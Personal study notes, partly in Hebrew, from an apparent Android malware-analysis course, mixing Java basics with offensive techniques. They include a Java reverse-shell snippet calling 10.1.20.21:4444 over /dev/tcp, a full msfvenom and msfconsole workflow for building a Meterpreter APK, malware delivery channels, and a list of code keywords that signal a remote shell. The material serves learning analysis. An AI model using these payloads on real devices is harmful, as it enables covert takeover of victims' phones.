Android malware & Runtime Debugging.
-------------------------------------
איך מנתחים אפליקציה לחיפוש vulnerability
java--> High level language
switch case --> 
int day = 4;
switch(day) {
    case1: (--> if day = 1) ...
    case2: (--> elif day= 2)
}
switch case --> another way for "if" "else" statement.
--------------------------------------
print to screen -->
System.out.printIn("hello world")
-------------------
סוגי משתנים
public class Main {
    public static void main(String[] args) {
        int num = 1;
        String str = "Something";
        float flo = 1.1;
        boolean bool = true;
        char ch = 'd';
    }
}
-------------------------------------------also has if else and elif
-------------------------------------
default --> else
----------------------------------------
for loop:
public class Main {
    public static void main(String[] args) {
        for (int i = 0; i < 10; i++) {
            System.out.println(i);
        }
    }
}

will print 0 to 9
stracture -- start, end and step
----------------------------------------
x = "haker"
y = "hacker"

if(x.equals(y)) 
{
    System.out.print("THe strings are equals");
}
-----------------------------
ReverseShell:

@Override
public void onClick(View v) {
String command = "sh -c /bin/bash -i >& /dev/tcp/10.1.20.21/4444 0>&1";
try {
Process process = Runtime.getRuntime().exec(command);}
catch (IOException e) {
e.printStackTrace();}}}
----------------------------------
while we investigate code need do be aware for :

import (library)
permissions
sockets, inputs...
----------------------------------------
Java runtime:
like the system command in Python, just in Java.

Example: settin a process

Process process = Runtime.getRuntime().exec(command);
------------------------------------------
Suspicious Activity :

* Unofficial --> Apk that are not available in store

* Background --> Application run in backup while the Application is not active

* Permissions ---> asking permissions for critic things.
-------------------------------------------
# Gathering information : KeyWords to search for in the code :

* "/bin/sh"; --> Used to enable a command-line interface (CLI) on the victim's machine. This is often used to execute commands remotely.

* InputStream --> Used to send data to a client. This could be used to transmit information from a server to a client.

* Socket --> Used to open the first connection with a client. A socket is a communication endpoint that allows data to be sent and received.

* host --> A string that will often be followed by an IP. This typically refers to a computer or device on a network.

* import java.net.Socket; --> A library used to open connections (sockets) in the network. This Java library provides classes and methods for creating and managing network connections.

 * import java.io.InputStream; --> A library used to send data via the network. This Java library provides classes and methods for reading data from an input stream, such as a network socket.
 -----------------------------------------
Log sending in JAVA:

 Log.i (Information)
 Log.d (Debugging)
 Log.e (Errors)
 ------------------------------------------
Android Shell types:
-------------------------------------------
* ADB

* PushpenderIndia

* Evildroid

All of this are shells whiich based on Meterpreter.
-------------------------------------------
Malware Delivery // ways to cracked file :

* website --> לינק לאתר

* SMS --> לינק ב ס.מ.ס

* Bluetooth --> לינק בבלטוס
-------------------------------------------
MsfVenom & Meterpreter :
create payload that I put in it the Lhsot(ip host), Lport(port) and I can gain a reverese shell.

The command for it is :

msfvenom -p android/meterpreter/reverse_tcp lhost = IPkali lport=54321 -f raw -o Name.apk

* -p --> payload 
* -f --> format
* -o --> output

Full process :

1.
msfvenom -p android/meterpreter/reverse_tcp lhost=[KALI IP] lport=[KALI PORT] -f raw -o file.apk

2. run msfconsole:

use exploit/multi/handler 
set payload android/meterpreter/reverse_tcp
set lhost [KALI IP]
set lport [KALI PORT]
run

On Emuator --> Just drag the Application to the Phone.

While on meterpreter :
applist --> shows all the application
-? --> show all the abilities for the meterpreter.  

#   THIS WAS DYNAMIC INVESTIGATION. 
-------------------------------------------
# move file from kali to host :
On kali --> python3 -m http.server 80
On Host --> Chrome --> Ipkali:80
-------------------------------------------
Analasys Methodes :

* Static --> investigate the apk file without starting the application (just from the source code)

* Dynamic --> when I have tools that can check the behavior of the Application and investigate it. Analise the Application *WITH* start it.
 ------------------------------------------
 MobSF --> Tool that helps Analise The App based on the Static Analise methode.
 